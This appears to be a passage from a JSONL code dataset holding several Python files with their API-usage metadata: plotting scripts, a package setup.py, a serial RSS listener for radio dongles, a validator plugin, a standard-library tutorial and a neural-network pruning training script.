"usage_type": "attribute"}, {"api_name": "extensions.db", "line_number": 32, "usage_type": "name"}, {"api_name": "extensions.db.session.commit", "line_number": 33, "usage_type": "call"}, {"api_name": "extensions.db.session", "line_number": 33, "usage_type": "attribute"}, {"api_name": "extensions.db", "line_number": 33, "usage_type": "name"}, {"api_name": "env.logger.info", "line_number": 35, "usage_type": "call"}, {"api_name": "env.logger", "line_number": 35, "usage_type": "name"}, {"api_name": "env.celery.task", "line_number": 17, "usage_type": "call"}, {"api_name": "env.celery", "line_number": 17, "usage_type": "name"}, {"api_name": "models.Newsletter.query.filter", "line_number": 40, "usage_type": "call"}, {"api_name": "models.Newsletter.query", "line_number": 40, "usage_type": "attribute"}, {"api_name": "models.Newsletter", "line_number": 40, "usage_type": "name"}, {"api_name": "models.Newsletter.validate_ts.isnot", "line_number": 41, "usage_type": "call"}, {"api_name": "models.Newsletter.validate_ts", "line_number": 41, "usage_type": "attribute"}, {"api_name": "models.Newsletter", "line_number": 41, "usage_type": "name"}, {"api_name": "models.Newsletter.last_mail.isnot", "line_number": 42, 
"usage_type": "call"}, {"api_name": "models.Newsletter.last_mail", "line_number": 42, "usage_type": "attribute"}, {"api_name": "models.Newsletter", "line_number": 42, "usage_type": "name"}, {"api_name": "models.Newsletter.last_mail", "line_number": 43, "usage_type": "attribute"}, {"api_name": "models.Newsletter", "line_number": 43, "usage_type": "name"}, {"api_name": "models.Newsletter.validate_ts", "line_number": 43, "usage_type": "attribute"}, {"api_name": "flask.ext.mail.Message", "line_number": 47, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 50, "usage_type": "call"}, {"api_name": "extensions.mail", "line_number": 51, "usage_type": "argument"}, {"api_name": "arrow.utcnow", "line_number": 53, "usage_type": "call"}, {"api_name": "extensions.db.session.add", "line_number": 54, "usage_type": "call"}, {"api_name": "extensions.db.session", "line_number": 54, "usage_type": "attribute"}, {"api_name": "extensions.db", "line_number": 54, "usage_type": "name"}, {"api_name": "extensions.db.session.commit", "line_number": 55, "usage_type": "call"}, {"api_name": "extensions.db.session", "line_number": 55, "usage_type": "attribute"}, {"api_name": "extensions.db", "line_number": 55, "usage_type": "name"}, {"api_name": "env.logger.info", "line_number": 57, "usage_type": "call"}, {"api_name": "env.logger", "line_number": 57, "usage_type": "name"}, {"api_name": "env.celery.task", "line_number": 38, "usage_type": "call"}, {"api_name": "env.celery", "line_number": 38, "usage_type": "name"}]} +{"seq_id": "419723746", "text": "import matplotlib.pyplot as plt\nimport numpy as np\nimport pickle\n\n\ndef preprocess(para_list, dic):\n rounds_data_list = []\n for para in para_list:\n rounds_data_list.append(dic[para])\n return rounds_data_list\n\n\ndef std_avg_graph():\n para_u = [0, 6, 12, 24, 48, 96, 188]\n para_r = [0, 16, 32, 48, 64, 96, 128, 256, 512, 768]\n\n u_data_dict = pickle.load(open(\"uni_data_1000_\", \"rb\"))\n r_data_dict = pickle.load(open(\"ratio_data_1000_\", \"rb\"))\n\n data_to_plot_u = preprocess(para_u, u_data_dict)\n\n data_to_plot_r = preprocess(para_r, r_data_dict)\n\n fig = plt.figure(1, figsize=(9, 6))\n\n # Create an axes instance\n ax = fig.add_subplot(111)\n\n # Create the boxplot\n bp = ax.boxplot(data_to_plot_r, showmeans=True, labels=para_r)\n plt.xlabel(\"Number_Of_Trusted_Nodes\")\n plt.ylabel(\"Number of Rounds\")\n plt.title(\"Ratio_Distributed_Good_Nodes_In_Random_Case\")\n plt.show()\n\n\ndef alg_compare_graph(result_dict):\n for num_trusted, small_dict in result_dict.items():\n for alg_label, rounds_list in small_dict.items():\n if alg_label == 0:\n plt.plot(list(range(len(rounds_list))), rounds_list, 'r--', label='DEGREE_CENTRALITY')\n elif alg_label == 1:\n plt.plot(list(range(len(rounds_list))), rounds_list, 'b--', label='EIGEN_CENTRALITY')\n elif alg_label == 2:\n plt.plot(list(range(len(rounds_list))), rounds_list, 'g--', label='CLOSENESS_CENTRALITY')\n elif alg_label == 3:\n plt.plot(list(range(len(rounds_list))), rounds_list, 'y--', label='BETWEENNESS_CENTRALITY')\n elif alg_label == 4:\n plt.plot(list(range(len(rounds_list))), rounds_list, 'c--', label='UNIFORM_TOTAL')\n elif alg_label == 5:\n plt.plot(list(range(len(rounds_list))), rounds_list, 'm--', label='UNIFORM_SUB')\n elif alg_label == 6:\n plt.plot(list(range(len(rounds_list))), rounds_list, 'k--', label='WEIGHTED_EDGEs')\n plt.xticks(np.arange(0, len(rounds_list), 1.0))\n plt.legend(loc='best')\n plt.title(f\"number of trusted node : {num_trusted}\")\n 
plt.savefig(f\"testing_int{num_trusted}\")\n plt.clf()\n\n\n# key: number of trusted\n# value: small dict:\n # key: algorithm name\n # number of rounds\nif __name__ == '__main__':\n result_dict = pickle.load(open(\"/Users/yingjianwu/Desktop/broadcast/Broadcast_py/result_dict_0123.pickle\", \"rb\"))\n result_dict_456 = pickle.load(open(\"/Users/yingjianwu/Desktop/broadcast/Broadcast_py/result_dict_456.pickle\", \"rb\"))\n\n for k, v in result_dict_456.items():\n small_dict_in_result_dict = result_dict[k]\n for a, b in v.items():\n small_dict_in_result_dict[a] = b\n alg_compare_graph(result_dict)", "sub_path": "Graph.py", "file_name": "Graph.py", "file_ext": "py", "file_size_in_byte": 2800, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "pickle.load", "line_number": 17, "usage_type": "call"}, {"api_name": "pickle.load", "line_number": 18, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 24, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 24, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 31, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 31, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 32, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 32, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 33, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 33, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 34, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 34, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 41, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 41, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 43, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 43, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 45, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 45, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 47, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 47, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 49, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 49, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 51, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 51, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 53, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 53, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xticks", "line_number": 54, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 54, "usage_type": "name"}, {"api_name": "numpy.arange", "line_number": 54, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 55, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 55, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 56, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 56, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 57, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 57, "usage_type": "name"}, 
{"api_name": "matplotlib.pyplot.clf", "line_number": 58, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 58, "usage_type": "name"}, {"api_name": "pickle.load", "line_number": 66, "usage_type": "call"}, {"api_name": "pickle.load", "line_number": 67, "usage_type": "call"}]} +{"seq_id": "254865488", "text": "#!/usr/bin/env python\n\nfrom setuptools import setup\nfrom glob import glob\nimport platform, sys\n\npackages=['palaso', 'palaso.collation', 'palaso.kmn', 'palaso.sfm', \n 'palaso.teckit', 'palaso.text', 'palaso.font', 'palaso.contrib',\n 'palaso.contrib.freetype', 'palaso.contrib.freetype.ft_enums',\n 'palaso.contrib.funcparserlib', 'palaso.unicode', 'palaso.sldr']\ntry:\n from Pyrex.Distutils.extension import Extension\n from Pyrex.Distutils import build_ext\n ext =[ Extension(\"palaso.kmfl\", [\"lib/palaso.kmfl.pyx\"], libraries=[\"kmfl\", \"kmflcomp\"]) ] \n cmd = {'build_ext': build_ext}\n packages.insert(0, '')\nexcept ImportError:\n print(\"No Pyrex!\")\n ext = []\n cmd = {}\n\nsetup(name='palaso',\n version='0.7.4',\n description='Payap Language Software python package and scripts',\n long_description=\"Modules and scripts useful for building language software.\",\n maintainer='Tim Eves',\n maintainer_email='tim_eves@sil.org',\n url='http://github.com/silnrsi/palaso-python',\n packages=packages,\n ext_modules = ext,\n cmdclass = cmd,\n scripts=list(filter(lambda x : x.rfind(\".\") == -1, glob('scripts/*/*'))),\n license='LGPL',\n platforms=['Linux','Win32','Mac OS X'],\n package_dir={'':'lib'},\n package_data={'palaso.sfm':['usfm.sty'], 'palaso.kmn':['keyboard.svg'], \n 'palaso.collation' : ['sort_trainer.glade'],\n 'palaso.sldr': ['allkeys.txt', 'language-subtag-registry.txt',\n 'likelySubtags.xml', 'supplementalData.xml',\n 'supplementalMetadata.xml']}\n )\n\n", "sub_path": "setup.py", "file_name": "setup.py", "file_ext": "py", "file_size_in_byte": 1672, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "Pyrex.Distutils.extension.Extension", "line_number": 14, "usage_type": "call"}, {"api_name": "Pyrex.Distutils.build_ext", "line_number": 15, "usage_type": "name"}, {"api_name": "setuptools.setup", "line_number": 22, "usage_type": "call"}, {"api_name": "glob.glob", "line_number": 32, "usage_type": "call"}]} +{"seq_id": "463174198", "text": "'''\nCreated on May 23, 2016\n\n@author: Peter Hillyard\n'''\n\n# This module contains the classes to listen to the wireless traffic in a \n# mesh network for the cc253x TI dongles. The advantage of this class is that\n# it gives you a function that pulls in the next set of RSS measurements from \n# the links. 
The user can use this function to get the next measurements and\n# run a real-time algorithm very easily and with all of the serial communication\n# abstracted.\n\n# This class takes care of the \nimport sys\nimport platform\nimport glob\n# import numpy.ma as ma\nimport numpy as np\nimport serial\nimport time\nfrom struct import unpack\nimport rss\n\nclass listen:\n \n # Initializer\n def __init__(self,max_nodes=0,ch_list=[],fout_name='',sound_print_flag=0,beep_rate=0.):\n self.numNodes = max_nodes # total number of nodes in network\n self.channelList = ch_list # channels (11-26) used in communication\n self.nodeList = None # all tx-ids\n self.numChs = None # number of channels\n self.numLinks = None # number of links\n self.nodeSet = None # node list in set form\n self.channelSet = None # channel list in set form\n self.currentLine = None # holds the serial data\n self.cur_line = None # str of RSS and timestamp\n self.currentLinkRSS = None # holds the link RSS data\n self.rssIndex = None # index where the RSS starts in the list\n self.string_length = None # length of a packet\n self.suffix = None # end-of-line marker\n self.rxId_idx = None # Index where the rxId is in the packet (unique to node type)\n self.ch_idx = None # index where the channel number is in the packet (unique to node type)\n \n self.ser = None # the serial object used to get rss measurements\n \n self.fout_name = fout_name # file name to save data\n self.fout = None # output file object\n \n self.sound_print_flag = sound_print_flag # print and make beep sound flag\n self.beepCounter = None # keeps track of the number of beeps\n self.beepRate = beep_rate # number of beeps per second\n self.startTime = None # keeps track of when the script starts\n \n self.__run_init() # Run initialization\n \n def observe(self):\n # Run forever, adding one integer at a time from the serial port, \n # whenever an integer is available. 
We break once a complete set of\n # RSS measurements are received from all links\n while(1):\n try:\n tempInt = self.ser.read().encode('hex')\n self.currentLine.append(tempInt)\n \n # Whenever the end-of-line sequence is read, operate on the \"packet\" of data.\n if self.currentLine[-len(self.suffix):] == self.suffix:\n if len(self.currentLine) != self.string_length:\n sys.stderr.write('packet corrupted - wrong string length\\n')\n del self.currentLine[:]\n continue\n currentLineInt = [int(x, 16) for x in self.currentLine]\n rxId = currentLineInt[self.rxId_idx]\n currentCh = currentLineInt[self.ch_idx]\n \n if (rxId not in self.nodeSet) or (currentCh not in self.channelSet):\n del self.currentLine[:]\n continue\n \n # Take care of beeping\n if self.sound_print_flag:\n timeStampSec = time.time()\n curBeepNumber = int((timeStampSec-self.startTime)/self.beepRate)\n if (curBeepNumber > self.beepCounter):\n self.beepCounter = curBeepNumber\n sys.stderr.write('\\a') # BEEP!\n sys.stderr.write(str((curBeepNumber - 40)/4.0 ) + '\\n')\n if curBeepNumber % 4 == 0:\n sys.stderr.write('\\a') # Double beep each \"measure\"\n sys.stderr.write('---\\n') \n \n # Each line in the serial data has RSS values for multiple txids.\n # Output one line per txid, rxid, ch combo.\n for txId in self.nodeList:\n # If the rxId is after the txId, then no problem -- currentCh\n # is also the channel that node txId was transmitting on when\n # node rxId made the measurement, because nodes transmit on a\n # channel in increasing order.\n if rxId > txId: \n ch = currentCh\n else: \n ch = rss.prevChannel(self.channelList, currentCh)\n \n # If the link (tx, rx, ch) is one we are supposed to watch\n if txId != rxId: \n i = rss.linkNumForTxRxChLists(txId, rxId, ch, self.nodeList, self.channelList)\n \n # If the RSS has already been recorded for this link on \n # this \"line\", then output the line first, and then restart \n # with a new line.\n if self.currentLinkRSS[i] < 127:\n # Output currentLinkRSS vector\n cur_line = ' '.join(map(str,self.currentLinkRSS)) + ' ' + str(time.time()) + '\\n'\n \n # Either print to std out\n if self.fout is None:\n sys.stdout.write(cur_line) \n sys.stdout.flush()\n else:\n self.fout.write(cur_line)\n \n \n # Restart with a new line by resetting currentLinkRSS\n self.currentLinkRSS = [127] * self.numLinks\n \n # Store the RSS \n self.currentLinkRSS[i] = rss.hex2signedint(self.currentLine[self.rssIndex+txId-1])\n \n # Remove serial data from the buffer.\n self.currentLine = []\n \n # break from loop\n break\n \n except KeyboardInterrupt:\n self.ser.close()\n sys.stderr.write('Listen stopped.')\n \n # get current RSS/timestamp string\n def get_cur_rss_ts(self):\n return self.cur_line\n \n # Run the initialization method. 
This runs the sniffer if the user doesn't\n # specify the number of nodes used or the channel list \n def __run_init(self):\n # open the serial port\n self.__open_ser()\n \n # If the user did not specify the number of nodes or the channel list,\n # they are opting to run the sniffer to get those values automatically\n if (self.numNodes == 0) | (len(self.channelList) == 0):\n sys.stderr.write('Running sniffer...\\n')\n self.__sniffer()\n \n # print useful info to screen\n sys.stderr.write('\\nMax nodes = ' + str(self.numNodes) + '.\\n')\n tmp = ''\n for item in self.channelList:\n tmp = tmp + str(item) + ', '\n sys.stderr.write('Channel list = [' + tmp[:-2] + ']\\n')\n \n # What node numbers are yours, that you want to see output to the file.\n # USER: SET THIS TO THE NODE IDS ASSIGNED TO YOU. DO NOT INCLUDE THE LISTEN NODE NUMBER\n self.nodeList = range(1,self.numNodes+1) # 1, ..., 30\n \n # Parameters that are due to our implementation of the listen node.\n self.numChs = len(self.channelList)\n self.numLinks = self.numNodes*(self.numNodes-1)*self.numChs\n \n # Initialize data\n self.nodeSet = set(self.nodeList)\n self.channelSet = set(self.channelList)\n self.currentLine = [] # Init serial data buffer \"currentLine\" as empty.\n self.currentLinkRSS = [127] * self.numLinks\n \n # Initialize output file, if needed\n if len(self.fout_name) != 0:\n self.fout = open(self.fout_name+'.txt','w')\n \n # set up beeping stuff if needed\n if self.sound_print_flag:\n self.startTime = time.time()\n\n # If you want beeps and/or second printing\n self.beepCounter = 0\n# self.beepRate = 1.0 # Beeps per second\n sys.stderr.write('firstBeepTime = ' + str(self.startTime) + '\\n')\n \n # This opens the serial port for reading\n def __open_ser(self):\n # Establish a serial connection and clear the buffer\n serial_filename = self.__serialFileName()\n sys.stderr.write('Using USB port file: ' + serial_filename + '\\n')\n self.ser = serial.Serial(serial_filename,38400)\n self.ser.flushInput()\n\n \n # Sniff out the packets to get the total number of nodes and the channels\n # used in this network\n def __sniffer(self): \n # ending key and the place to store the serial data\n beef = '\\xef' + '\\xbe'\n my_buffer = ''\n \n # list to store the list of node numbers and channels\n node_list = []\n channel_list = []\n \n # get a start time\n start_time = time.time()\n \n # Keep on listening for multi-Spin packets for 5 seconds\n while time.time() < (start_time + 5.):\n \n # keep adding measurements to the buffer\n my_buffer += self.ser.read(self.ser.inWaiting())\n \n # If the end key is found, proceed\n if beef in my_buffer:\n \n # unpack serial data\n lines = my_buffer.split(beef, 1)\n binaryPacket = lines[-2]\n my_buffer = lines[-1]\n spinPacket = unpack(' 0:\n serial_filename = usb_file_list[0] \n else:\n sys.stderr.write('Error: No Listen node plugged in?\\n')\n serial_filename = '0'\n #\n # WINDOWS USERS: Change 'COM#' to match what the system calls your USB port.\n elif system_name == 'Windows':\n serial_filename = 'COM3'\n #\n # MAC USERS\n else: # 'Darwin' indicates MAC OS X\n # Automatically grab the USB filename (since the number after /dev/tty.usb may vary)\n usb_file_list = glob.glob('/dev/tty.usb*')\n# print usb_file_list\n# quit()\n if len(usb_file_list) > 0:\n serial_filename = usb_file_list[0] \n else:\n sys.stderr.write('Error: No Listen node plugged in?\\n')\n \n #serial_filename = '/dev/tty.usbmodem411'\n serial_filename = '/dev/tty.usbmodem001'\n \n return serial_filename\n\n# Class for cc253x 
dongles in SPAN lab\nclass cc253x_span_listen(listen):\n \n # Initializer\n def __init__(self, max_nodes=0,ch_list=[],fout_name='',sound_print_flag=0,beep_rate=0.):\n # Initialize listen object\n listen.__init__(self, max_nodes,ch_list,fout_name,sound_print_flag,beep_rate)\n \n self.rssIndex = 3 # index where the RSS starts in the list\n self.string_length = self.numNodes + 7 # length of a packet\n self.suffix = ['ef','be'] # end-of-line marker\n self.rxId_idx = 2 # index where the rx ID is in packet\n self.ch_idx = -4 # index where the channel number is in packet\n\n# Class for cc253x high-power xandem nodes\nclass cc253x_xandem_hp_listen(listen):\n \n # Initializer\n def __init__(self, max_nodes=2000, ch_list = [77,88,99,11,22,33],fout_name='',sound_print_flag=0,beep_rate=0.):\n # Initialize listen object\n listen.__init__(self, max_nodes,ch_list,fout_name,sound_print_flag,beep_rate)\n \n self.rssIndex = 9 # index where the RSS starts in the list\n self.string_length = self.numNodes + 25 # length of a packet\n self.suffix = ['ef','be', 'ad', 'de'] # end-of-line marker\n self.rxId_idx = 5 # index where the rx ID is in packet\n self.ch_idx = 2 # index where the channel number is in packet\n \n \n \n ", "sub_path": "cc253x_listen.py", "file_name": "cc253x_listen.py", "file_ext": "py", "file_size_in_byte": 13983, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "sys.stderr.write", "line_number": 69, "usage_type": "call"}, {"api_name": "sys.stderr", "line_number": 69, "usage_type": "attribute"}, {"api_name": "time.time", "line_number": 82, "usage_type": "call"}, {"api_name": "sys.stderr.write", "line_number": 86, "usage_type": "call"}, {"api_name": "sys.stderr", "line_number": 86, "usage_type": "attribute"}, {"api_name": "sys.stderr.write", "line_number": 87, "usage_type": "call"}, {"api_name": "sys.stderr", "line_number": 87, "usage_type": "attribute"}, {"api_name": "sys.stderr.write", "line_number": 89, "usage_type": "call"}, {"api_name": "sys.stderr", "line_number": 89, "usage_type": "attribute"}, {"api_name": "sys.stderr.write", "line_number": 90, "usage_type": "call"}, {"api_name": "sys.stderr", "line_number": 90, "usage_type": "attribute"}, {"api_name": "rss.prevChannel", "line_number": 102, "usage_type": "call"}, {"api_name": "rss.linkNumForTxRxChLists", "line_number": 106, "usage_type": "call"}, {"api_name": "time.time", "line_number": 113, "usage_type": "call"}, {"api_name": "sys.stdout.write", "line_number": 117, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 117, "usage_type": "attribute"}, {"api_name": "sys.stdout.flush", "line_number": 118, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 118, "usage_type": "attribute"}, {"api_name": "rss.hex2signedint", "line_number": 127, "usage_type": "call"}, {"api_name": "sys.stderr.write", "line_number": 137, "usage_type": "call"}, {"api_name": "sys.stderr", "line_number": 137, "usage_type": "attribute"}, {"api_name": "sys.stderr.write", "line_number": 152, "usage_type": "call"}, {"api_name": "sys.stderr", "line_number": 152, "usage_type": "attribute"}, {"api_name": "sys.stderr.write", "line_number": 156, "usage_type": "call"}, {"api_name": "sys.stderr", "line_number": 156, "usage_type": "attribute"}, {"api_name": "sys.stderr.write", "line_number": 160, "usage_type": "call"}, {"api_name": "sys.stderr", "line_number": 160, "usage_type": "attribute"}, {"api_name": "time.time", "line_number": 182, "usage_type": "call"}, {"api_name": 
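The listen subclasses in the cc253x_listen.py record above are designed to be polled one RSS vector at a time. A hypothetical driver loop (node count and channel list are made up); note that observe() assigns a local variable cur_line instead of self.cur_line, so get_cur_rss_ts() returns None until that assignment is fixed:

from cc253x_listen import cc253x_span_listen

listener = cc253x_span_listen(max_nodes=6, ch_list=[11, 15, 20, 26])
while True:
    listener.observe()                # returns once the next complete packet is processed
    line = listener.get_cur_rss_ts()  # RSS values plus timestamp (see the caveat above)
    # ...hand `line` to a real-time algorithm here...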
"sys.stderr.write", "line_number": 187, "usage_type": "call"}, {"api_name": "sys.stderr", "line_number": 187, "usage_type": "attribute"}, {"api_name": "sys.stderr.write", "line_number": 193, "usage_type": "call"}, {"api_name": "sys.stderr", "line_number": 193, "usage_type": "attribute"}, {"api_name": "serial.Serial", "line_number": 194, "usage_type": "call"}, {"api_name": "time.time", "line_number": 210, "usage_type": "call"}, {"api_name": "time.time", "line_number": 213, "usage_type": "call"}, {"api_name": "struct.unpack", "line_number": 225, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 231, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 238, "usage_type": "call"}, {"api_name": "platform.system", "line_number": 249, "usage_type": "call"}, {"api_name": "glob.glob", "line_number": 254, "usage_type": "call"}, {"api_name": "sys.stderr.write", "line_number": 258, "usage_type": "call"}, {"api_name": "sys.stderr", "line_number": 258, "usage_type": "attribute"}, {"api_name": "glob.glob", "line_number": 268, "usage_type": "call"}, {"api_name": "sys.stderr.write", "line_number": 274, "usage_type": "call"}, {"api_name": "sys.stderr", "line_number": 274, "usage_type": "attribute"}]} +{"seq_id": "115953974", "text": "from systems.plugins.index import BaseProvider\n\nimport datetime\n\n\nclass Provider(BaseProvider('validator', 'date_time')):\n\n def validate(self, value):\n if isinstance(value, float):\n value = int(value)\n try:\n datetime.datetime.strptime(str(value), self.field_format)\n except ValueError as e:\n self.warning(\"Value {} is not a valid date time according to pattern: {}\".format(value, self.field_format))\n return False\n return True\n", "sub_path": "app/plugins/validator/date_time.py", "file_name": "date_time.py", "file_ext": "py", "file_size_in_byte": 502, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "systems.plugins.index.BaseProvider", "line_number": 6, "usage_type": "call"}, {"api_name": "datetime.datetime.strptime", "line_number": 12, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 12, "usage_type": "attribute"}]} +{"seq_id": "255132063", "text": "## datetime 处理日期和时间的标准库\nfrom datetime import datetime\nnow = datetime.now()\nprint(now)\n\n### 获取指定日期和时间\ndt = datetime(2015, 4, 19, 12, 20)\nprint( dt )\n\n### datetime转化为timestamp\n# timestamp = 0 = 1970-1-1 00:00:00 UTC+0:00\nprint( dt.timestamp() )\n\n\n### timestamp转化为datetime\nt = 1429417200.0\nprint( datetime.fromtimestamp(t) ) # 本地时间\nprint( datetime.utcfromtimestamp(t) ) #utc时间\n\n\n### str转换为datetime\ncday = datetime.strptime(\"2016-6-1 18:19:59\", '%Y-%m-%d %H:%M:%S')\nprint( cday )\n\n\n### datetime转换为str\nnow = datetime.now()\nprint( now.strftime('%a, %b %d %H:%M') )\n\n### datetime加减\nfrom datetime import datetime, timedelta\nnow = datetime.now()\n\nprint(now)\nprint(now + timedelta(hours=10))\n\nprint(now - timedelta(days=1))\n\nprint(now - timedelta(days=2, hours=12))\n\n### 本地时间转换为utc时间\nfrom datetime import datetime, timedelta, timezone\n\n\n## collections\n'''\ntuple表示不变集合,一个点的二维坐标就可以表示成:\np = (1, 2) 但这样不是很明确\n'''\nfrom collections import namedtuple\nPoint = namedtuple('Point', ['x', 'y'])\np = Point(1, 2)\nprint(p.x)\nprint(p.y)\n\nprint( isinstance(p, Point) )\nprint( isinstance(p, tuple) )\n\n## deque\n'''\n使用list存储数据时,按索引访问元素很快,但插入和删除元素就很慢。因为list是线性存储\ndeque视为了高效实现插入和删除操作的双向列表,适合用于队列和栈\nappend() pop() appendleft() popleft()\n'''\nfrom collections import deque\nq = 
deque(['a', 'b', 'c'])\nq.append('x')\nq.appendleft('y')\nprint(q)\n\n### defaultdict\n''' If a referenced key is missing, dict raises a KeyError. Use defaultdict to get a default value back for missing keys '''\nfrom collections import defaultdict\ndd = defaultdict(lambda : 'N/A')\ndd['key1'] = 'abc'\n\nprint( dd['key1'] )\nprint( dd['key2'] )\n\n### orderedDict\n''' Keys of a dict are unordered. To keep keys in insertion order, use OrderedDict '''\nfrom collections import OrderedDict\nd = dict([('a', 1), ('c', 2), ('b', 3)])\nprint(d)\nod = OrderedDict([('a', 1), ('b', 2), ('c', 3)])\nprint(od)\n\n''' OrderedDict can implement a FIFO (first-in, first-out) dict: once the capacity limit is exceeded, the earliest added key is removed first '''\nclass LastUpdateOrderedDict(OrderedDict):\n    def __init__(self, capacity):\n        super(LastUpdateOrderedDict, self).__init__()\n        self._capacity = capacity\n\n    def __setitem__(self, key, value):\n        containsKey = 1 if key in self else 0\n        if len(self) - containsKey >= self._capacity:\n            last = self.popitem(last=False)\n            print(\"remove:\", last)\n        if containsKey:\n            del self[key]\n            print(\"set:\", (key, value))\n        else:\n            print(\"add:\", (key, value))\n        OrderedDict.__setitem__(self, key, value)\n\n### Counter\nfrom collections import Counter\nc = Counter()\nfor ch in 'programming':\n    c[ch] = c[ch] + 1\n\nprint( c )\n\n\n## base64\nimport base64\nprint( base64.b64encode(b'binary\\x00string') )\n\nprint( base64.b64encode(b'YmluYXJ5AHN0cmluZw==') )\n\n## struct\n'''\nPython has no data type dedicated to processing bytes.\n'''\n", "sub_path": "lesson/12 batteries included.py", "file_name": "12 batteries included.py", "file_ext": "py", "file_size_in_byte": 3146, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "datetime.datetime.now", "line_number": 3, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 3, "usage_type": "name"}, {"api_name": "datetime.datetime", "line_number": 7, "usage_type": "call"}, {"api_name": "datetime.datetime.fromtimestamp", "line_number": 17, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 17, "usage_type": "name"}, {"api_name": "datetime.datetime.utcfromtimestamp", "line_number": 18, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 18, "usage_type": "name"}, {"api_name": "datetime.datetime.strptime", "line_number": 22, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 22, "usage_type": "name"}, {"api_name": "datetime.datetime.now", "line_number": 27, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 27, "usage_type": "name"}, {"api_name": "datetime.datetime.now", "line_number": 32, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 32, "usage_type": "name"}, {"api_name": "datetime.timedelta", "line_number": 35, "usage_type": "call"}, {"api_name": "datetime.timedelta", "line_number": 37, "usage_type": "call"}, {"api_name": "datetime.timedelta", "line_number": 39, "usage_type": "call"}, {"api_name": "collections.namedtuple", "line_number": 51, "usage_type": "call"}, {"api_name": "collections.deque", "line_number": 66, "usage_type": "call"}, {"api_name": "collections.defaultdict", "line_number": 74, "usage_type": "call"}, {"api_name": "collections.OrderedDict", "line_number": 85, "usage_type": "call"}, {"api_name": "collections.OrderedDict", "line_number": 89, "usage_type": "name"}, {"api_name": "collections.OrderedDict.__setitem__", "line_number": 104, "usage_type": "call"}, {"api_name": "collections.OrderedDict", "line_number": 104, "usage_type": "name"}, {"api_name": "collections.Counter", "line_number": 108, "usage_type": "call"},
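A quick, hypothetical check of the LastUpdateOrderedDict defined in the lesson above (capacity 2, assuming the corrected __init__ spelling and the class being in scope):

d = LastUpdateOrderedDict(2)
d['a'] = 1   # prints: add: ('a', 1)
d['b'] = 2   # prints: add: ('b', 2)
d['c'] = 3   # prints: remove: ('a', 1), then: add: ('c', 3)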
{"api_name": "base64.b64encode", "line_number": 117, "usage_type": "call"}, {"api_name": "base64.b64encode", "line_number": 119, "usage_type": "call"}]} +{"seq_id": "481248120", "text": "import os\nimport numpy as np\nimport utils.common as utils\nfrom utils.options import args\nfrom tensorboardX import SummaryWriter\nfrom importlib import import_module\n\nimport torch\nimport torch.nn as nn\nimport torch.optim as optim\nimport torch.nn.functional as F\nfrom torch.optim.lr_scheduler import StepLR\n\nfrom fista import FISTA\n# from model import Discriminator\n\nfrom data.svhn import Data\n\nfrom ptflops import get_model_complexity_info # from thop import profile\n\n\n# torch.backends.cudnn.benchmark = False\ndevice = torch.device(f\"cuda:{args.gpus[0]}\")\n\ncheckpoint = utils.checkpoint(args)\nprint_logger = utils.get_logger(os.path.join(args.job_dir, \"logger.log\"))\nwriter_train = SummaryWriter(args.job_dir + '/run/train')\nwriter_test = SummaryWriter(args.job_dir + '/run/test')\n\n\ndef main():\n\n start_epoch = 0\n best_prec1 = 0.0\n best_prec5 = 